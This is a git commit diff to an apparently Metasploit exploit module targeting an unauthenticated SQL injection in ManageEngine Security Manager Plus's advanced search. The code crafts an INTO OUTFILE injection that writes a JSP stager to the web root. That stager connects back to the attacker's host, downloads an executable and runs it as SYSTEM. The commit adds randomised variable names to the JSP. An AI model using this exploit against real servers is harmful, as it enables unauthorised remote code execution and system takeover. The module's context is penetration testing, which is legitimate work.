Final improvements
sinn3r
parent
5072156df6
commit
669d22c917
|
|
@ -21,21 +21,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a SQL injection found in ManageEngine Security Manager Plus
|
||||
advanced search page. It will send a malicious SQL query to create a JSP file
|
||||
under the web root directory, and then let it download and execute our malicious
|
||||
executable under the context of SYSTEM. No authentication is necessary to exploit this.
|
||||
executable under the context of SYSTEM. Authentication is not required in order
|
||||
to exploit this vulnerability.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'xistence' # Discovery & Metasploit module
|
||||
'xistence <xistence[at]0x90.nl>', # Discovery & Metasploit module
|
||||
'sinn3r' # Improved Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB','22094']
|
||||
['EDB','22094'],
|
||||
['BID', '56138']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Win XP / 2003 / Vista / Win 7 / etc
|
||||
['Windows Universal', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
|
|
@ -53,12 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# A very gentle check to see if Security Manager Plus exists or not
|
||||
#
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/SecurityManager.cc'
|
||||
})
|
||||
res = send_request_raw({'uri' => '/SecurityManager.cc'})
|
||||
|
||||
if res and res.body =~ /\<title\>Security Manager Plus\<\/title\>/
|
||||
if res and res.body =~ /\<title\>SecurityManager Plus\<\/title\>/
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
|
|
@ -72,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
def on_new_session(cli)
|
||||
if cli.type != 'meterpreter'
|
||||
print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
|
||||
print_warning("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
|
||||
return
|
||||
end
|
||||
|
||||
|
|
@ -105,33 +104,43 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
|
||||
my_port = datastore['SRVPORT']
|
||||
|
||||
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_socket = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_temp = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
|
||||
jsp = %Q|
|
||||
<%@page import="java.io.*"%>
|
||||
<%@page import="java.net.*"%>
|
||||
<%@page import="sun.misc.BASE64Decoder"%>
|
||||
|
||||
<%
|
||||
StringBuffer buf = new StringBuffer();
|
||||
byte[] shellcode = null;
|
||||
BufferedOutputStream outstream = null;
|
||||
StringBuffer #{var_buf} = new StringBuffer();
|
||||
byte[] #{var_shellcode} = null;
|
||||
BufferedOutputStream #{var_outstream} = null;
|
||||
try {
|
||||
Socket s = new Socket("#{my_host}", #{my_port});
|
||||
BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
|
||||
while (buf.length() < #{@native_payload.length}) {
|
||||
buf.append( (char) r.read());
|
||||
Socket #{var_socket} = new Socket("#{my_host}", #{my_port});
|
||||
BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
|
||||
while (#{var_buf}.length() < #{@native_payload.length}) {
|
||||
#{var_buf}.append( (char) #{var_bufreader}.read());
|
||||
}
|
||||
|
||||
BASE64Decoder decoder = new BASE64Decoder();
|
||||
shellcode = decoder.decodeBuffer(buf.toString());
|
||||
BASE64Decoder #{var_decoder} = new BASE64Decoder();
|
||||
#{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
|
||||
|
||||
File temp = File.createTempFile("#{@native_payload_name}", ".exe");
|
||||
String path = temp.getAbsolutePath();
|
||||
File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe");
|
||||
String #{var_path} = #{var_temp}.getAbsolutePath();
|
||||
|
||||
outstream = new BufferedOutputStream(new FileOutputStream(path));
|
||||
outstream.write(shellcode);
|
||||
outstream.close();
|
||||
#{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
|
||||
#{var_outstream}.write(#{var_shellcode});
|
||||
#{var_outstream}.close();
|
||||
|
||||
Process p = Runtime.getRuntime().exec(path);
|
||||
Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
|
||||
} catch (Exception e) {}
|
||||
%>
|
||||
|
|
||||
|
|
@ -151,36 +160,48 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
select(nil, nil, nil, 1)
|
||||
|
||||
# Inject our JSP payload
|
||||
print_status("#{rhost}:#{rport} - Sending JSP payload")
|
||||
pass = rand_text_alpha(rand(10)+5)
|
||||
hex_jsp = generate_jsp_payload
|
||||
|
||||
cookie = 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;'
|
||||
cookie = 'STATE_COOKIE=&'
|
||||
cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
|
||||
cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
|
||||
cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
|
||||
cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
|
||||
cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
|
||||
cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
|
||||
cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
|
||||
cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
|
||||
cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'
|
||||
|
||||
rnd_num = Rex::Text.rand_text_numeric(1)
|
||||
sqli = "#{rnd_num})) union select 0x#{hex_jsp},"
|
||||
sqli << (2..28).map {|e| e} * ","
|
||||
sqli << " into outfile #{@outpath} FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
|
||||
|
||||
state_id = Rex::Text.rand_text_numeric(5)
|
||||
print_status("#{rhost}:#{rport} - Sending JSP payload")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP',
|
||||
'uri' => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
|
||||
'headers' => {
|
||||
'Cookie' => cookie,
|
||||
'Accept-Encoding' => 'identity'
|
||||
},
|
||||
'vars_get' => {
|
||||
'reqType' =>'AdvanceSearch',
|
||||
'SUBREQUEST' =>'XMLHTTP'
|
||||
},
|
||||
'vars_post' => {
|
||||
'ANDOR' => 'and',
|
||||
'condition_1' => 'OpenPorts@PORT',
|
||||
'operator_1' => 'IN',
|
||||
'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1",
|
||||
'value_1' => sqli,
|
||||
'COUNT' => '1'
|
||||
}
|
||||
})
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}")
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "/#{@jsp_name + '.jsp'}",
|
||||
'headers' => {
|
||||
'Cookie' => 'pwnage'
|
||||
}
|
||||
})
|
||||
send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"})
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue